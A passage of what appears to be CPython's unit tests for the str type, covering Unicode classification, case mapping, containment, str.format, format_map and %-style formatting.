'\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.isnumeric(), '{!a} is not numeric.'.format(ch))
for ch in ['\U00011065', '\U0001D7F6', '\U00011066',
'\U000104A0', '\U0001F107']:
self.assertTrue(ch.isnumeric(), '{!a} is numeric.'.format(ch))
def test_isidentifier(self):
self.assertTrue("a".isidentifier())
self.assertTrue("Z".isidentifier())
self.assertTrue("_".isidentifier())
self.assertTrue("b0".isidentifier())
self.assertTrue("bc".isidentifier())
self.assertTrue("b_".isidentifier())
self.assertTrue("µ".isidentifier())
self.assertTrue("𝔘𝔫𝔦𝔠𝔬𝔡𝔢".isidentifier())
self.assertFalse(" ".isidentifier())
self.assertFalse("[".isidentifier())
self.assertFalse("©".isidentifier())
self.assertFalse("0".isidentifier())
def test_isprintable(self):
self.assertTrue("".isprintable())
self.assertTrue(" ".isprintable())
self.assertTrue("abcdefg".isprintable())
self.assertFalse("abcdefg\n".isprintable())
# some defined Unicode character
self.assertTrue("\u0374".isprintable())
# undefined character
self.assertFalse("\u0378".isprintable())
# single surrogate character
self.assertFalse("\ud800".isprintable())
self.assertTrue('\U0001F46F'.isprintable())
self.assertFalse('\U000E0020'.isprintable())
def test_surrogates(self):
for s in ('a\uD800b\uDFFF', 'a\uDFFFb\uD800',
'a\uD800b\uDFFFa', 'a\uDFFFb\uD800a'):
self.assertTrue(s.islower())
self.assertFalse(s.isupper())
self.assertFalse(s.istitle())
for s in ('A\uD800B\uDFFF', 'A\uDFFFB\uD800',
'A\uD800B\uDFFFA', 'A\uDFFFB\uD800A'):
self.assertFalse(s.islower())
self.assertTrue(s.isupper())
self.assertTrue(s.istitle())
for meth_name in ('islower', 'isupper', 'istitle'):
meth = getattr(str, meth_name)
for s in ('\uD800', '\uDFFF', '\uD800\uD800', '\uDFFF\uDFFF'):
self.assertFalse(meth(s), '%a.%s() is False' % (s, meth_name))
for meth_name in ('isalpha', 'isalnum', 'isdigit', 'isspace',
'isdecimal', 'isnumeric',
'isidentifier', 'isprintable'):
meth = getattr(str, meth_name)
for s in ('\uD800', '\uDFFF', '\uD800\uD800', '\uDFFF\uDFFF',
'a\uD800b\uDFFF', 'a\uDFFFb\uD800',
'a\uD800b\uDFFFa', 'a\uDFFFb\uD800a'):
self.assertFalse(meth(s), '%a.%s() is False' % (s, meth_name))
def test_lower(self):
string_tests.CommonTest.test_lower(self)
self.assertEqual('\U00010427'.lower(), '\U0001044F')
self.assertEqual('\U00010427\U00010427'.lower(),
'\U0001044F\U0001044F')
self.assertEqual('\U00010427\U0001044F'.lower(),
'\U0001044F\U0001044F')
self.assertEqual('X\U00010427x\U0001044F'.lower(),
'x\U0001044Fx\U0001044F')
self.assertEqual('fi'.lower(), 'fi')
self.assertEqual('\u0130'.lower(), '\u0069\u0307')
# Special case for GREEK CAPITAL LETTER SIGMA U+03A3
self.assertEqual('\u03a3'.lower(), '\u03c3')
self.assertEqual('\u0345\u03a3'.lower(), '\u0345\u03c3')
self.assertEqual('A\u0345\u03a3'.lower(), 'a\u0345\u03c2')
self.assertEqual('A\u0345\u03a3a'.lower(), 'a\u0345\u03c3a')
self.assertEqual('A\u0345\u03a3'.lower(), 'a\u0345\u03c2')
self.assertEqual('A\u03a3\u0345'.lower(), 'a\u03c2\u0345')
self.assertEqual('\u03a3\u0345 '.lower(), '\u03c3\u0345 ')
self.assertEqual('\U0008fffe'.lower(), '\U0008fffe')
self.assertEqual('\u2177'.lower(), '\u2177')
def test_casefold(self):
self.assertEqual('hello'.casefold(), 'hello')
self.assertEqual('hELlo'.casefold(), 'hello')
self.assertEqual('ß'.casefold(), 'ss')
self.assertEqual('fi'.casefold(), 'fi')
self.assertEqual('\u03a3'.casefold(), '\u03c3')
self.assertEqual('A\u0345\u03a3'.casefold(), 'a\u03b9\u03c3')
self.assertEqual('\u00b5'.casefold(), '\u03bc')
def test_upper(self):
string_tests.CommonTest.test_upper(self)
self.assertEqual('\U0001044F'.upper(), '\U00010427')
self.assertEqual('\U0001044F\U0001044F'.upper(),
'\U00010427\U00010427')
self.assertEqual('\U00010427\U0001044F'.upper(),
'\U00010427\U00010427')
self.assertEqual('X\U00010427x\U0001044F'.upper(),
'X\U00010427X\U00010427')
self.assertEqual('fi'.upper(), 'FI')
self.assertEqual('\u0130'.upper(), '\u0130')
self.assertEqual('\u03a3'.upper(), '\u03a3')
self.assertEqual('ß'.upper(), 'SS')
self.assertEqual('\u1fd2'.upper(), '\u0399\u0308\u0300')
self.assertEqual('\U0008fffe'.upper(), '\U0008fffe')
self.assertEqual('\u2177'.upper(), '\u2167')
def test_capitalize(self):
string_tests.CommonTest.test_capitalize(self)
self.assertEqual('\U0001044F'.capitalize(), '\U00010427')
self.assertEqual('\U0001044F\U0001044F'.capitalize(),
'\U00010427\U0001044F')
self.assertEqual('\U00010427\U0001044F'.capitalize(),
'\U00010427\U0001044F')
self.assertEqual('\U0001044F\U00010427'.capitalize(),
'\U00010427\U0001044F')
self.assertEqual('X\U00010427x\U0001044F'.capitalize(),
'X\U0001044Fx\U0001044F')
self.assertEqual('h\u0130'.capitalize(), 'H\u0069\u0307')
exp = '\u0399\u0308\u0300\u0069\u0307'
self.assertEqual('\u1fd2\u0130'.capitalize(), exp)
self.assertEqual('finnish'.capitalize(), 'FInnish')
self.assertEqual('A\u0345\u03a3'.capitalize(), 'A\u0345\u03c2')
def test_title(self):
super().test_title()
self.assertEqual('\U0001044F'.title(), '\U00010427')
self.assertEqual('\U0001044F\U0001044F'.title(),
'\U00010427\U0001044F')
self.assertEqual('\U0001044F\U0001044F \U0001044F\U0001044F'.title(),
'\U00010427\U0001044F \U00010427\U0001044F')
self.assertEqual('\U00010427\U0001044F \U00010427\U0001044F'.title(),
'\U00010427\U0001044F \U00010427\U0001044F')
self.assertEqual('\U0001044F\U00010427 \U0001044F\U00010427'.title(),
'\U00010427\U0001044F \U00010427\U0001044F')
self.assertEqual('X\U00010427x\U0001044F X\U00010427x\U0001044F'.title(),
'X\U0001044Fx\U0001044F X\U0001044Fx\U0001044F')
self.assertEqual('fiNNISH'.title(), 'Finnish')
self.assertEqual('A\u03a3 \u1fa1xy'.title(), 'A\u03c2 \u1fa9xy')
self.assertEqual('A\u03a3A'.title(), 'A\u03c3a')
def test_swapcase(self):
string_tests.CommonTest.test_swapcase(self)
self.assertEqual('\U0001044F'.swapcase(), '\U00010427')
self.assertEqual('\U00010427'.swapcase(), '\U0001044F')
self.assertEqual('\U0001044F\U0001044F'.swapcase(),
'\U00010427\U00010427')
self.assertEqual('\U00010427\U0001044F'.swapcase(),
'\U0001044F\U00010427')
self.assertEqual('\U0001044F\U00010427'.swapcase(),
'\U00010427\U0001044F')
self.assertEqual('X\U00010427x\U0001044F'.swapcase(),
'x\U0001044FX\U00010427')
self.assertEqual('fi'.swapcase(), 'FI')
self.assertEqual('\u0130'.swapcase(), '\u0069\u0307')
# Special case for GREEK CAPITAL LETTER SIGMA U+03A3
self.assertEqual('\u03a3'.swapcase(), '\u03c3')
self.assertEqual('\u0345\u03a3'.swapcase(), '\u0399\u03c3')
self.assertEqual('A\u0345\u03a3'.swapcase(), 'a\u0399\u03c2')
self.assertEqual('A\u0345\u03a3a'.swapcase(), 'a\u0399\u03c3A')
self.assertEqual('A\u0345\u03a3'.swapcase(), 'a\u0399\u03c2')
self.assertEqual('A\u03a3\u0345'.swapcase(), 'a\u03c2\u0399')
self.assertEqual('\u03a3\u0345 '.swapcase(), '\u03c3\u0399 ')
self.assertEqual('\u03a3'.swapcase(), '\u03c3')
self.assertEqual('ß'.swapcase(), 'SS')
self.assertEqual('\u1fd2'.swapcase(), '\u0399\u0308\u0300')
def test_center(self):
string_tests.CommonTest.test_center(self)
self.assertEqual('x'.center(2, '\U0010FFFF'),
'x\U0010FFFF')
self.assertEqual('x'.center(3, '\U0010FFFF'),
'\U0010FFFFx\U0010FFFF')
self.assertEqual('x'.center(4, '\U0010FFFF'),
'\U0010FFFFx\U0010FFFF\U0010FFFF')
@unittest.skipUnless(sys.maxsize == 2**31 - 1, "requires 32-bit system")
@support.cpython_only
def test_case_operation_overflow(self):
# Issue #22643
size = 2**32//12 + 1
try:
s = "ü" * size
except MemoryError:
self.skipTest('no enough memory (%.0f MiB required)' % (size / 2**20))
try:
self.assertRaises(OverflowError, s.upper)
finally:
del s
def test_contains(self):
# Testing Unicode contains method
self.assertIn('a', 'abdb')
self.assertIn('a', 'bdab')
self.assertIn('a', 'bdaba')
self.assertIn('a', 'bdba')
self.assertNotIn('a', 'bdb')
self.assertIn('a', 'bdba')
self.assertIn('a', ('a',1,None))
self.assertIn('a', (1,None,'a'))
self.assertIn('a', ('a',1,None))
self.assertIn('a', (1,None,'a'))
self.assertNotIn('a', ('x',1,'y'))
self.assertNotIn('a', ('x',1,None))
self.assertNotIn('abcd', 'abcxxxx')
self.assertIn('ab', 'abcd')
self.assertIn('ab', 'abc')
self.assertIn('ab', (1,None,'ab'))
self.assertIn('', 'abc')
self.assertIn('', '')
self.assertIn('', 'abc')
self.assertNotIn('\0', 'abc')
self.assertIn('\0', '\0abc')
self.assertIn('\0', 'abc\0')
self.assertIn('a', '\0abc')
self.assertIn('asdf', 'asdf')
self.assertNotIn('asdf', 'asd')
self.assertNotIn('asdf', '')
self.assertRaises(TypeError, "abc".__contains__)
# test mixed kinds
for fill in ('a', '\u0100', '\U00010300'):
fill *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.assertNotIn(delim, fill)
self.assertIn(delim, fill + delim)
self.assertNotIn(delim * 2, fill)
self.assertIn(delim * 2, fill + delim * 2)
def test_issue18183(self):
'\U00010000\U00100000'.lower()
'\U00010000\U00100000'.casefold()
'\U00010000\U00100000'.upper()
'\U00010000\U00100000'.capitalize()
'\U00010000\U00100000'.title()
'\U00010000\U00100000'.swapcase()
'\U00100000'.center(3, '\U00010000')
'\U00100000'.ljust(3, '\U00010000')
'\U00100000'.rjust(3, '\U00010000')
def test_format(self):
self.assertEqual(''.format(), '')
self.assertEqual('a'.format(), 'a')
self.assertEqual('ab'.format(), 'ab')
self.assertEqual('a{{'.format(), 'a{')
self.assertEqual('a}}'.format(), 'a}')
self.assertEqual('{{b'.format(), '{b')
self.assertEqual('}}b'.format(), '}b')
self.assertEqual('a{{b'.format(), 'a{b')
# examples from the PEP:
import datetime
self.assertEqual("My name is {0}".format('Fred'), "My name is Fred")
self.assertEqual("My name is {0[name]}".format(dict(name='Fred')),
"My name is Fred")
self.assertEqual("My name is {0} :-{{}}".format('Fred'),
"My name is Fred :-{}")
d = datetime.date(2007, 8, 18)
self.assertEqual("The year is {0.year}".format(d),
"The year is 2007")
# classes we'll use for testing
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
class D:
def __init__(self, x):
self.x = x
def __format__(self, spec):
return str(self.x)
# class with __str__, but no __format__
class E:
def __init__(self, x):
self.x = x
def __str__(self):
return 'E(' + self.x + ')'
# class with __repr__, but no __format__ or __str__
class F:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'F(' + self.x + ')'
# class with __format__ that forwards to string, for some format_spec's
class G:
def __init__(self, x):
self.x = x
def __str__(self):
return "string is " + self.x
def __format__(self, format_spec):
if format_spec == 'd':
return 'G(' + self.x + ')'
return object.__format__(self, format_spec)
class I(datetime.date):
def __format__(self, format_spec):
return self.strftime(format_spec)
class J(int):
def __format__(self, format_spec):
return int.__format__(self * 2, format_spec)
class M:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'M(' + self.x + ')'
__str__ = None
class N:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'N(' + self.x + ')'
__format__ = None
self.assertEqual(''.format(), '')
self.assertEqual('abc'.format(), 'abc')
self.assertEqual('{0}'.format('abc'), 'abc')
self.assertEqual('{0:}'.format('abc'), 'abc')
# self.assertEqual('{ 0 }'.format('abc'), 'abc')
self.assertEqual('X{0}'.format('abc'), 'Xabc')
self.assertEqual('{0}X'.format('abc'), 'abcX')
self.assertEqual('X{0}Y'.format('abc'), 'XabcY')
self.assertEqual('{1}'.format(1, 'abc'), 'abc')
self.assertEqual('X{1}'.format(1, 'abc'), 'Xabc')
self.assertEqual('{1}X'.format(1, 'abc'), 'abcX')
self.assertEqual('X{1}Y'.format(1, 'abc'), 'XabcY')
self.assertEqual('{0}'.format(-15), '-15')
self.assertEqual('{0}{1}'.format(-15, 'abc'), '-15abc')
self.assertEqual('{0}X{1}'.format(-15, 'abc'), '-15Xabc')
self.assertEqual('{{'.format(), '{')
self.assertEqual('}}'.format(), '}')
self.assertEqual('{{}}'.format(), '{}')
self.assertEqual('{{x}}'.format(), '{x}')
self.assertEqual('{{{0}}}'.format(123), '{123}')
self.assertEqual('{{{{0}}}}'.format(), '{{0}}')
self.assertEqual('}}{{'.format(), '}{')
self.assertEqual('}}x{{'.format(), '}x{')
# weird field names
self.assertEqual("{0[foo-bar]}".format({'foo-bar':'baz'}), 'baz')
self.assertEqual("{0[foo bar]}".format({'foo bar':'baz'}), 'baz')
self.assertEqual("{0[ ]}".format({' ':3}), '3')
self.assertEqual('{foo._x}'.format(foo=C(20)), '20')
self.assertEqual('{1}{0}'.format(D(10), D(20)), '2010')
self.assertEqual('{0._x.x}'.format(C(D('abc'))), 'abc')
self.assertEqual('{0[0]}'.format(['abc', 'def']), 'abc')
self.assertEqual('{0[1]}'.format(['abc', 'def']), 'def')
self.assertEqual('{0[1][0]}'.format(['abc', ['def']]), 'def')
self.assertEqual('{0[1][0].x}'.format(['abc', [D('def')]]), 'def')
# strings
self.assertEqual('{0:.3s}'.format('abc'), 'abc')
self.assertEqual('{0:.3s}'.format('ab'), 'ab')
self.assertEqual('{0:.3s}'.format('abcdef'), 'abc')
self.assertEqual('{0:.0s}'.format('abcdef'), '')
self.assertEqual('{0:3.3s}'.format('abc'), 'abc')
self.assertEqual('{0:2.3s}'.format('abc'), 'abc')
self.assertEqual('{0:2.2s}'.format('abc'), 'ab')
self.assertEqual('{0:3.2s}'.format('abc'), 'ab ')
self.assertEqual('{0:x<0s}'.format('result'), 'result')
self.assertEqual('{0:x<5s}'.format('result'), 'result')
self.assertEqual('{0:x<6s}'.format('result'), 'result')
self.assertEqual('{0:x<7s}'.format('result'), 'resultx')
self.assertEqual('{0:x<8s}'.format('result'), 'resultxx')
self.assertEqual('{0: <7s}'.format('result'), 'result ')
self.assertEqual('{0:<7s}'.format('result'), 'result ')
self.assertEqual('{0:>7s}'.format('result'), ' result')
self.assertEqual('{0:>8s}'.format('result'), ' result')
self.assertEqual('{0:^8s}'.format('result'), ' result ')
self.assertEqual('{0:^9s}'.format('result'), ' result ')
self.assertEqual('{0:^10s}'.format('result'), ' result ')
self.assertEqual('{0:10000}'.format('a'), 'a' + ' ' * 9999)
self.assertEqual('{0:10000}'.format(''), ' ' * 10000)
self.assertEqual('{0:10000000}'.format(''), ' ' * 10000000)
# issue 12546: use \x00 as a fill character
self.assertEqual('{0:\x00<6s}'.format('foo'), 'foo\x00\x00\x00')
self.assertEqual('{0:\x01<6s}'.format('foo'), 'foo\x01\x01\x01')
self.assertEqual('{0:\x00^6s}'.format('foo'), '\x00foo\x00\x00')
self.assertEqual('{0:^6s}'.format('foo'), ' foo ')
self.assertEqual('{0:\x00<6}'.format(3), '3\x00\x00\x00\x00\x00')
self.assertEqual('{0:\x01<6}'.format(3), '3\x01\x01\x01\x01\x01')
self.assertEqual('{0:\x00^6}'.format(3), '\x00\x003\x00\x00\x00')
self.assertEqual('{0:<6}'.format(3), '3 ')
self.assertEqual('{0:\x00<6}'.format(3.14), '3.14\x00\x00')
self.assertEqual('{0:\x01<6}'.format(3.14), '3.14\x01\x01')
self.assertEqual('{0:\x00^6}'.format(3.14), '\x003.14\x00')
self.assertEqual('{0:^6}'.format(3.14), ' 3.14 ')
self.assertEqual('{0:\x00<12}'.format(3+2.0j), '(3+2j)\x00\x00\x00\x00\x00\x00')
self.assertEqual('{0:\x01<12}'.format(3+2.0j), '(3+2j)\x01\x01\x01\x01\x01\x01')
self.assertEqual('{0:\x00^12}'.format(3+2.0j), '\x00\x00\x00(3+2j)\x00\x00\x00')
self.assertEqual('{0:^12}'.format(3+2.0j), ' (3+2j) ')
# format specifiers for user defined type
self.assertEqual('{0:abc}'.format(C()), 'abc')
# !r, !s and !a coercions
self.assertEqual('{0!s}'.format('Hello'), 'Hello')
self.assertEqual('{0!s:}'.format('Hello'), 'Hello')
self.assertEqual('{0!s:15}'.format('Hello'), 'Hello ')
self.assertEqual('{0!s:15s}'.format('Hello'), 'Hello ')
self.assertEqual('{0!r}'.format('Hello'), "'Hello'")
self.assertEqual('{0!r:}'.format('Hello'), "'Hello'")
self.assertEqual('{0!r}'.format(F('Hello')), 'F(Hello)')
self.assertEqual('{0!r}'.format('\u0378'), "'\\u0378'") # nonprintable
self.assertEqual('{0!r}'.format('\u0374'), "'\u0374'") # printable
self.assertEqual('{0!r}'.format(F('\u0374')), 'F(\u0374)')
self.assertEqual('{0!a}'.format('Hello'), "'Hello'")
self.assertEqual('{0!a}'.format('\u0378'), "'\\u0378'") # nonprintable
self.assertEqual('{0!a}'.format('\u0374'), "'\\u0374'") # printable
self.assertEqual('{0!a:}'.format('Hello'), "'Hello'")
self.assertEqual('{0!a}'.format(F('Hello')), 'F(Hello)')
self.assertEqual('{0!a}'.format(F('\u0374')), 'F(\\u0374)')
# test fallback to object.__format__
self.assertEqual('{0}'.format({}), '{}')
self.assertEqual('{0}'.format([]), '[]')
self.assertEqual('{0}'.format([1]), '[1]')
self.assertEqual('{0:d}'.format(G('data')), 'G(data)')
self.assertEqual('{0!s}'.format(G('data')), 'string is data')
self.assertRaises(TypeError, '{0:^10}'.format, E('data'))
self.assertRaises(TypeError, '{0:^10s}'.format, E('data'))
self.assertRaises(TypeError, '{0:>15s}'.format, G('data'))
self.assertEqual("{0:date: %Y-%m-%d}".format(I(year=2007,
month=8,
day=27)),
"date: 2007-08-27")
# test deriving from a builtin type and overriding __format__
self.assertEqual("{0}".format(J(10)), "20")
# string format specifiers
self.assertEqual('{0:}'.format('a'), 'a')
# computed format specifiers
self.assertEqual("{0:.{1}}".format('hello world', 5), 'hello')
self.assertEqual("{0:.{1}s}".format('hello world', 5), 'hello')
self.assertEqual("{0:.{precision}s}".format('hello world', precision=5), 'hello')
self.assertEqual("{0:{width}.{precision}s}".format('hello world', width=10, precision=5), 'hello ')
self.assertEqual("{0:{width}.{precision}s}".format('hello world', width='10', precision='5'), 'hello ')
# test various errors
self.assertRaises(ValueError, '{'.format)
self.assertRaises(ValueError, '}'.format)
self.assertRaises(ValueError, 'a{'.format)
self.assertRaises(ValueError, 'a}'.format)
self.assertRaises(ValueError, '{a'.format)
self.assertRaises(ValueError, '}a'.format)
self.assertRaises(IndexError, '{0}'.format)
self.assertRaises(IndexError, '{1}'.format, 'abc')
self.assertRaises(KeyError, '{x}'.format)
self.assertRaises(ValueError, "}{".format)
self.assertRaises(ValueError, "abc{0:{}".format)
self.assertRaises(ValueError, "{0".format)
self.assertRaises(IndexError, "{0.}".format)
self.assertRaises(ValueError, "{0.}".format, 0)
self.assertRaises(ValueError, "{0[}".format)
self.assertRaises(ValueError, "{0[}".format, [])
self.assertRaises(KeyError, "{0]}".format)
self.assertRaises(ValueError, "{0.[]}".format, 0)
self.assertRaises(ValueError, "{0..foo}".format, 0)
self.assertRaises(ValueError, "{0[0}".format, 0)
self.assertRaises(ValueError, "{0[0:foo}".format, 0)
self.assertRaises(KeyError, "{c]}".format)
self.assertRaises(ValueError, "{{ {{{0}}".format, 0)
self.assertRaises(ValueError, "{0}}".format, 0)
self.assertRaises(KeyError, "{foo}".format, bar=3)
self.assertRaises(ValueError, "{0!x}".format, 3)
self.assertRaises(ValueError, "{0!}".format, 0)
self.assertRaises(ValueError, "{0!rs}".format, 0)
self.assertRaises(ValueError, "{!}".format)
self.assertRaises(IndexError, "{:}".format)
self.assertRaises(IndexError, "{:s}".format)
self.assertRaises(IndexError, "{}".format)
big = "23098475029384702983476098230754973209482573"
self.assertRaises(ValueError, ("{" + big + "}").format)
self.assertRaises(ValueError, ("{[" + big + "]}").format, [0])
# issue 6089
self.assertRaises(ValueError, "{0[0]x}".format, [None])
self.assertRaises(ValueError, "{0[0](10)}".format, [None])
# can't have a replacement on the field name portion
self.assertRaises(TypeError, '{0[{1}]}'.format, 'abcdefg', 4)
# exceed maximum recursion depth
self.assertRaises(ValueError, "{0:{1:{2}}}".format, 'abc', 's', '')
self.assertRaises(ValueError, "{0:{1:{2:{3:{4:{5:{6}}}}}}}".format,
0, 1, 2, 3, 4, 5, 6, 7)
# string format spec errors
self.assertRaises(ValueError, "{0:-s}".format, '')
self.assertRaises(ValueError, format, "", "-")
self.assertRaises(ValueError, "{0:=s}".format, '')
# Alternate formatting is not supported
self.assertRaises(ValueError, format, '', '#')
self.assertRaises(ValueError, format, '', '#20')
# Non-ASCII
self.assertEqual("{0:s}{1:s}".format("ABC", "\u0410\u0411\u0412"),
'ABC\u0410\u0411\u0412')
self.assertEqual("{0:.3s}".format("ABC\u0410\u0411\u0412"),
'ABC')
self.assertEqual("{0:.0s}".format("ABC\u0410\u0411\u0412"),
'')
self.assertEqual("{[{}]}".format({"{}": 5}), "5")
self.assertEqual("{[{}]}".format({"{}" : "a"}), "a")
self.assertEqual("{[{]}".format({"{" : "a"}), "a")
self.assertEqual("{[}]}".format({"}" : "a"}), "a")
self.assertEqual("{[[]}".format({"[" : "a"}), "a")
self.assertEqual("{[!]}".format({"!" : "a"}), "a")
self.assertRaises(ValueError, "{a{}b}".format, 42)
self.assertRaises(ValueError, "{a{b}".format, 42)
self.assertRaises(ValueError, "{[}".format, 42)
self.assertEqual("0x{:0{:d}X}".format(0x0,16), "0x0000000000000000")
# Blocking fallback
m = M('data')
self.assertEqual("{!r}".format(m), 'M(data)')
self.assertRaises(TypeError, "{!s}".format, m)
self.assertRaises(TypeError, "{}".format, m)
n = N('data')
self.assertEqual("{!r}".format(n), 'N(data)')
self.assertEqual("{!s}".format(n), 'N(data)')
self.assertRaises(TypeError, "{}".format, n)
def test_format_map(self):
self.assertEqual(''.format_map({}), '')
self.assertEqual('a'.format_map({}), 'a')
self.assertEqual('ab'.format_map({}), 'ab')
self.assertEqual('a{{'.format_map({}), 'a{')
self.assertEqual('a}}'.format_map({}), 'a}')
self.assertEqual('{{b'.format_map({}), '{b')
self.assertEqual('}}b'.format_map({}), '}b')
self.assertEqual('a{{b'.format_map({}), 'a{b')
# using mappings
class Mapping(dict):
def __missing__(self, key):
return key
self.assertEqual('{hello}'.format_map(Mapping()), 'hello')
self.assertEqual('{a} {world}'.format_map(Mapping(a='hello')), 'hello world')
class InternalMapping:
def __init__(self):
self.mapping = {'a': 'hello'}
def __getitem__(self, key):
return self.mapping[key]
self.assertEqual('{a}'.format_map(InternalMapping()), 'hello')
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
self.assertEqual('{foo._x}'.format_map({'foo': C(20)}), '20')
# test various errors
self.assertRaises(TypeError, ''.format_map)
self.assertRaises(TypeError, 'a'.format_map)
self.assertRaises(ValueError, '{'.format_map, {})
self.assertRaises(ValueError, '}'.format_map, {})
self.assertRaises(ValueError, 'a{'.format_map, {})
self.assertRaises(ValueError, 'a}'.format_map, {})
self.assertRaises(ValueError, '{a'.format_map, {})
self.assertRaises(ValueError, '}a'.format_map, {})
# issue #12579: can't supply positional params to format_map
self.assertRaises(ValueError, '{}'.format_map, {'a' : 2})
self.assertRaises(ValueError, '{}'.format_map, 'a')
self.assertRaises(ValueError, '{a} {}'.format_map, {"a" : 2, "b" : 1})
def test_format_huge_precision(self):
format_string = ".{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format(2.34, format_string)
def test_format_huge_width(self):
format_string = "{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format(2.34, format_string)
def test_format_huge_item_number(self):
format_string = "{{{}:.6f}}".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string.format(2.34)
def test_format_auto_numbering(self):
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
self.assertEqual('{}'.format(10), '10')
self.assertEqual('{:5}'.format('s'), 's ')
self.assertEqual('{!r}'.format('s'), "'s'")
self.assertEqual('{._x}'.format(C(10)), '10')
self.assertEqual('{[1]}'.format([1, 2]), '2')
self.assertEqual('{[a]}'.format({'a':4, 'b':2}), '4')
self.assertEqual('a{}b{}c'.format(0, 1), 'a0b1c')
self.assertEqual('a{:{}}b'.format('x', '^10'), 'a x b')
self.assertEqual('a{:{}x}b'.format(20, '#'), 'a0x14b')
# can't mix and match numbering and auto-numbering
self.assertRaises(ValueError, '{}{1}'.format, 1, 2)
self.assertRaises(ValueError, '{1}{}'.format, 1, 2)
self.assertRaises(ValueError, '{:{1}}'.format, 1, 2)
self.assertRaises(ValueError, '{0:{}}'.format, 1, 2)
# can mix and match auto-numbering and named
self.assertEqual('{f}{}'.format(4, f='test'), 'test4')
self.assertEqual('{}{f}'.format(4, f='test'), '4test')
self.assertEqual('{:{f}}{g}{}'.format(1, 3, g='g', f=2), ' 1g3')
self.assertEqual('{f:{}}{}{g}'.format(2, 4, f=1, g='g'), ' 14g')
def test_formatting(self):
string_tests.MixinStrUnicodeUserStringTest.test_formatting(self)
# Testing Unicode formatting strings...
self.assertEqual("%s, %s" % ("abc", "abc"), 'abc, abc')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", 1, 2, 3), 'abc, abc, 1, 2.000000, 3.00')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", 1, -2, 3), 'abc, abc, 1, -2.000000, 3.00')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 3.5), 'abc, abc, -1, -2.000000, 3.50')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 3.57), 'abc, abc, -1, -2.000000, 3.57')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 1003.57), 'abc, abc, -1, -2.000000, 1003.57')
if not sys.platform.startswith('java'):
self.assertEqual("%r, %r" % (b"abc", "abc"), "b'abc', 'abc'")
self.assertEqual("%r" % ("\u1234",), "'\u1234'")
self.assertEqual("%a" % ("\u1234",), "'\\u1234'")
self.assertEqual("%(x)s, %(y)s" % {'x':"abc", 'y':"def"}, 'abc, def')
self.assertEqual("%(x)s, %(\xfc)s" % {'x':"abc", '\xfc':"def"}, 'abc, def')
self.assertEqual('%c' % 0x1234, '\u1234')
self.assertEqual('%c' % 0x21483, '\U00021483')
self.assertRaises(OverflowError, "%c".__mod__, (0x110000,))
self.assertEqual('%c' % '\U00021483', '\U00021483')
self.assertRaises(TypeError, "%c".__mod__, "aa")
self.assertRaises(ValueError, "%.1\u1032f".__mod__, (1.0/3))
self.assertRaises(TypeError, "%i".__mod__, "aa")
# formatting jobs delegated from the string implementation:
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc",'def':123}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc",'def':123}, '...abc...')
self.assertEqual('...%s...%s...%s...%s...' % (1,2,3,"abc"), '...1...2...3...abc...')
self.assertEqual('...%%...%%s...%s...%s...%s...%s...' % (1,2,3,"abc"), '...%...%s...1...2...3...abc...')
self.assertEqual('...%s...' % "abc", '...abc...')
self.assertEqual('%*s' % (5,'abc',), ' abc')
self.assertEqual('%*s' % (-5,'abc',), 'abc ')
self.assertEqual('%*.*s' % (5,2,'abc',), ' ab')
self.assertEqual('%*.*s' % (5,3,'abc',), ' abc')
self.assertEqual('%i %*.*s' % (10, 5,3,'abc',), '10 abc')
self.assertEqual('%i%s %*.*s' % (10, 3, 5, 3, 'abc',), '103 abc')
self.assertEqual('%c' % 'a', 'a')
class Wrapper:
def __str__(self):
return '\u1234'
self.assertEqual('%s' % Wrapper(), '\u1234')
# issue 3382
NAN = float('nan')
INF = float('inf')
self.assertEqual('%f' % NAN, 'nan')
self.assertEqual('%F' % NAN, 'NAN')
self.assertEqual('%f' % INF, 'inf')
self.assertEqual('%F' % INF, 'INF')
# PEP 393
self.assertEqual('%.1s' % "a\xe9\u20ac", 'a')
self.assertEqual('%.2s' % "a\xe9\u20ac", 'a\xe9')
#issue 19995
class PseudoInt:
def __init__(self, value):
self.value = int(value)
def __int__(self):
return self.value
def __index__(self):
return self.value
class PseudoFloat:
def __init__(self, value):
self.value = float(value)
def __int__(self):
return int(self.value)
pi = PseudoFloat(3.1415)
letter_m = PseudoInt(109)
self.assertEqual('%x' % 42, '2a')
self.assertEqual('%X' % 15, 'F')
self.assertEqual('%o' % 9, '11')
self.assertEqual('%c' % 109, 'm')
self.assertEqual('%x' % letter_m, '6d')
self.assertEqual('%X' % letter_m, '6D')
self.assertEqual('%o' % letter_m, '155')
self.assertEqual('%c' % letter_m, 'm')
self.assertRaisesRegex(TypeError, '%x format: an integer is required, not float', operator.mod, '%x', 3.14),
self.assertRaisesRegex(TypeError, '%X format: an integer is required, not float', operator.mod, '%X', 2.11),
self.assertRaisesRegex(TypeError, '%o format: an integer is required, not float', operator.mod, '%o', 1.79),
self.assertRaisesRegex(TypeError, '%x format: an integer is required, not PseudoFloat', operator.mod, '%x', pi),
self.assertRaises(TypeError, operator.mod, '%c', pi),
def test_formatting_with_enum(self):
# issue18780
import enum
class Float(float, enum.Enum):
PI = 3.1415926
class Int(enum.IntEnum):
IDES = 15
class Str(str, enum.Enum):
ABC = 'abc'
